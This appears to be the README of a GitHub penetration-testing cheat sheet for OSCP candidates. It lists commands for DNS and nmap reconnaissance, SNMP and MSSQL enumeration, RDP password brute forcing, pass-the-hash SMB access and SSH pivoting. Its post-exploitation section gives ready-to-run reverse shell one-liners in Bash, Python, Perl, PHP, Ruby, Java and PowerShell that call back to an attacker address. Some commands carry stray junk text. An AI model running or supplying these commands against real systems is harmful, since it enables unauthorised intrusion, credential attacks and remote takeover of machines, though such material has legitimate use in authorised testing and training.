Name	Name	Last commit message	Last commit date
Latest commit History 106 Commits
CheatSheets	CheatSheets
README.md	README.md
contribution.md	contribution.md

Pentest-Cheat-Sheets

This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.

Ninja Tricks

Recon
- DNS
- Nmap
- NetCat
- SNMP
- Mysql
- MS SQL
- Web Enumeration
Exploitation
- System Network
- Web Application
  - Web Remote Code Execution
  - LFI
  - encode
  - XSS
  - SQLi
    - sqlmap
    - Bare Hands
  - Jekins
Post-exploitation
Resources
Contribution

Recon

DNS

Nslookup

Resolve a given hostname to the corresponding IP.

nslookup targetorganization.com

Reverse DNS lookup

nslookup -type=PTR IP_address

MX(Mail Exchange) lookup

nslookup -type=MX domain

Zone Transfer

Using nslookup Command

nslookup
server domain.com
ls -d domain.com

Using HOST Command

host -t ns(Name Server) < domain >

host -t ns domain.com

after that test nameservers

host -l < domain > < nameserver >

host -l domain.com ns2.domain.com

Nmap Dns Enumaration

nmap -F --dns-server <dns server ip> <target ip range>

Auto tools

DNSenum

dnsenum targetdomain.com

dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com

DNSmap

dnsmap targetdomain.com -w <Wordlst file.txt>

Brute Force, the file is saved in /tmp

dnsmap targetdomain.com -r

DNSRecon DNS Brute Force

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Fierce.pl

fierce -dns targetdomain.com

HostMap

hostmap.rb -only-passive -t <IP>

We can use -with-zonetransfer or -bruteforce-level

Online Tools

Namp

Set the ip address as a varible export ip=192.168.1.100 export netw=192.168.1.0/24

Detecting Live Hosts

Only Ip's

nmap -sn -n $netw | grep for | cut -d" " -f5

Stealth Scan

nmap -sS $ip

Only Open Ports and Banner Grab

nmap -n -Pn -sS $ip --open -sV

Stealth scan using FIN Scan

map -sF $ip

Agressive scan

Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports

nmap -n -Pn -sS -A $ip --open -p-

Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services

nmap –v –sS –A –T4 $ip

OS FigerPrint

nmap -O $ip

Quick Scan

nmap -T4 -F $netw

Quick Scan Plus

nmap -sV -T4 -O -F --version-light $netw

output to a file

nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip

output to a file Plus

nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw

Search NMAP scripts

ls /usr/share/nmap/scripts/ | grep ftp

Nmap Discovery

NetCat

Port Scanner

One port

nc -nvz 192.168.1.23 80

Port Range

nc -vnz 192.168.1.23 0-1000

Send files

Server

nc -lvp 1234 > file_name_to_save

Client

nc -vn 192.168.1.33 1234 < file_to_send

Executing remote script

Server

nc -lvp 1234 -e ping.sh <IP>

Client

nc -vn 192.168.1.33 1234

Chat with encryption

Server

ncat -nlvp 8000 --ssl

Client

ncat -nv 192.168.1.33 8000

Banner Grabbing

nc target port
HTTP_Verb path http/version
Host: url

nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br

If this site uses https you need to use openssl

penssl s_client -quiet www.bla.com.br:443

SNMP

Fixing SNMP output

apt-get install snmp-mibs-downloader download-mibs

echo "" > /etc/snmp/snmp.conf

OneSixtyone

onesixtyone -c COMMUNITY_FILE -i Target_ip

onesixtyone -c community.txt -i Found_ips.txt

snmpwalk

Walking MIB's

snmpwalk -c COMMUNITY -v VERSION target_ip

snmpwalk -c public -v1 192.168.25.77

specific MIB node snmpwalk -c community -v version Target IP MIB Node Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25

snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25

snmp-check

snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY

snmp-check -t 172.20.10.5

snmp-check -t 172.20.10.5 -c public

Automate the username enumeration process for SNMPv3

apt-get install snmp snmp-mibs-downloader

wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

NMAP SNMPv3 Enumeration

nmap -sV -p 161 --script=snmp-info 172.20.10.0/24

Default Credentials

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

MYSQL

Try remote default Root access

Mysql Open to wild

mysql -h Target_ip -u root -p

Try Local default Root access Windows

TODO!

Try Local default Root access Linux

TODO!

MSSQL

MSQL Information Gathering

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip

Exploitation

System Network

RDP

xfreerdp

Simple User Enumeration for Windows Target (kerberos based)

xfreerdp /v:<target_ip> -sec-nla /u:""

xfreerdp /v:192.168.0.32 -sec-nla /u:""

login

xfreerdp /u: /g: /p: /v:<target_ip>

xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34

Wordlist based bruteforce

NCRACK

ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389

ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389

Crowbar

crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v

crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v

Pass the hash

Smb pass the hash

Tool:

pth-toolkit

Listing shared folders

sudo pth-smbclient --user= --pw-nt-hash -m smb3 -L <target_ip> \\<target_ip>\

sudo pth-smbclient --user=user --pw-nt-hash -m smb3  -L 192.168.0.24 \\\\192.168.0.24\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadklad

Interactive smb shell

sudo pth-smbclient --user= --pw-nt-hash -m smb3 \\<target_ip>\shared_folder

sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadklad

Post Exploitation

Reverse Shell

PHP Reverse Shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl Reverse Shell

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Bash Reverse Shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Powershell Reverse Shell

Create a simple powershell script called reverse.ps1:

function reverse_powershell {
    $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}

powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Xterm Reverse Shell

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

Linux

Windows

Pivoting

Openssh for Tunneling

Once you got SYSTEM on the target machine. download: openssh_for_windows

powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\openssh.zip' c:\<path-to-where-you-whereever-you-want\"

Then install it:

powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\install-sshd.ps1

Now if you need, just adjust the firewall rules to your needs:

powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"

Start the sshd service:

net start sshd

After these steps a regular ssh tunnel would sufice:

From your linux machine:

$ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip>

done you have now a socks to tunnel through!!

Resources

HTTP/HTTPS Servers

HTTPS using Python

Create the Certificate:

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

Start the HTTPS Server

import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()

Wordlists
Default Password
- DefaultPassword
- RouterPassword
Leak
- Pastebin
Tables
- RainbowCrack

Contribution

HOW TO

54N4L/Pentest-Cheat-Sheets

Folders and files

Latest commit

History

Repository files navigation